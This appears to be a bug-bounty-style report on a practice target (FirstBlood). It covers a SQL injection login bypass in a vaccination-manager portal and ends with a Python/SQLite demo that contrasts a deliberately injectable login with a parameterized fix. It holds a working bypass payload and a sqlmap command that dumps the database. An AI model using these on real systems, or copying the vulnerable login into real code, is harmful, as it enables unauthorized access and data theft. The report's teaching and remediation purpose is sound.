FirstBlood-#790 — SQLi allows to bypass login page for the vaccination-manager portal
This issue was discovered on FirstBlood v2
On 2021-10-28, panya Level 7 reported:
After some recon I found that the new feature (vaccination-manager) has a login page located at /vaccination-manager/login.php.
The form allows enumerating registered users (because it returns the error "User does not exist" for an unregistered username). I tried the username "admin" and it is indeed registered (it returns "Invalid username or password" for a random password).
But the password field value is vulnerable to SQL injection.
So to bypass the login form and log in as admin, we can use this payload as the admin user's password field value: test' or 1=1#
Impact:
An attacker could log in to the vaccination manager portal as admin. The attacker could also exfiltrate data from this database with sqlmap, for example using this command:
sqlmap -u 'https://7f2942c64ee8-panya.a.firstbloodhackers.com/vaccination-manager/login.php' --data 'username=admin&password=test' --dbms MySQL --technique B --dump -D firstblood
P1 CRITICAL
Endpoint: /vaccination-manager/login.php
Parameter: password
Payload: &username=admin&test' or 1=1#
FirstBlood ID: 30
Vulnerability Type: SQL Injection
There is an SQL injection on the vaccination management portal login page which results in the user being able to login as the administrator.
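Added illustration (this is not code from the report or from the FirstBlood application): a self-contained Python/SQLite model of the two flaws described above, a login that builds its query by string concatenation and that reveals whether a username exists, next to a hardened version using a parameterized query and a single error message. The table, the user names and passwords are constructed for the demo. The report's payload ends the injected query with the MySQL "#" comment; SQLite does not recognise "#", so the demo uses the equivalent "-- " comment to show the same bypass.

```python
import sqlite3

# Report payload (MySQL comment syntax) and its SQLite equivalent. SQLite has no "#"
# comment, so "-- " (with the trailing space) is used to swallow the closing quote.
MYSQL_PAYLOAD = "test' or 1=1#"
SQLITE_PAYLOAD = "test' or 1=1-- "


def make_db():
    """Constructed in-memory users table standing in for the portal's real table.
    The real schema and password storage are not known from the report; plaintext
    passwords are used here only to keep the injection visible."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('nurse1', 'flu2021')")
    return db


def vulnerable_login(db, username, password):
    """Login the way the report implies it is implemented.
    Returns (message, logged_in_username_or_None)."""
    # Separate existence check with its own message: this is the user-enumeration leak.
    exists = db.execute(
        "SELECT 1 FROM users WHERE username = '" + username + "'").fetchone()
    if not exists:
        return "User does not exist", None
    # Untrusted password concatenated straight into SQL: this is the injection.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    if row:
        return "Logged in as " + row[0], row[0]
    return "Invalid username or password", None


def hardened_login(db, username, password):
    """Parameterized query; the password is compared as data, never parsed as SQL,
    and unknown users and wrong passwords get the same message."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    if row:
        return "Logged in as " + row[0], row[0]
    return "Invalid username or password", None


def demonstrate():
    """Run both implementations against the same inputs; returns the outcomes."""
    db = make_db()
    return {
        "vuln_enum_unknown": vulnerable_login(db, "nobody", "x")[0],
        "vuln_enum_known": vulnerable_login(db, "admin", "wrongpass")[0],
        "vuln_bypass": vulnerable_login(db, "admin", SQLITE_PAYLOAD)[1],
        "hard_unknown": hardened_login(db, "nobody", "x")[0],
        "hard_payload": hardened_login(db, "admin", SQLITE_PAYLOAD)[1],
        "hard_real_creds": hardened_login(db, "admin", "S3cret!")[1],
    }


if __name__ == "__main__":
    for name, outcome in demonstrate().items():
        print(f"{name}: {outcome}")
```

With the injected password the concatenated WHERE clause becomes `username = 'admin' AND password = 'test' or 1=1` followed by a comment, which is true for every row, so the first user in the table (admin) is returned without a valid password. The parameterized version sends the same string as a bound value and simply fails the comparison; it also answers "Invalid username or password" for unknown users, closing the enumeration the report used to confirm that "admin" exists.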